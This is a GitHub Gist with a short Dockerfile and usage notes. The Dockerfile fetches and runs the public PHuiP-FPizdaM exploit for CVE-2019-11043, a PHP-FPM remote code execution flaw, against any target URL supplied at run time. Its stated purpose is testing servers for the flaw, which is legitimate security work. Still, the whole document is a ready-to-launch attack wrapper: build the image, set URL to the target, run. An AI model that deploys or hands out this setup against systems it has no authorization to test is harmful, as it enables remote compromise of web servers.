Last active
October 30, 2019 02:37
-
-
Save renan-taranto/5990c7a648377ec6286959ed0bedde8e to your computer and use it in GitHub Desktop.
PHuiP-FPizdaM Dockerfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM golang:1.13 | |
WORKDIR /go/src/app | |
RUN go get -v github.com/neex/phuip-fpizdam | |
CMD ["sh", "-c", "phuip-fpizdam ${URL}"] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Dockerfile to test for the CVE-2019-11043 issue using PHuiP-FPizdaM exploit.
Usage:
1- Build the image with
docker build -t phpuip-fpizdam .
2- Run with
docker run -e URL={URL} -t phpuip-fpizdam
, setting the URL environment variable to the target urlSee the official exploit repository for more information https://github.com/neex/phuip-fpizdam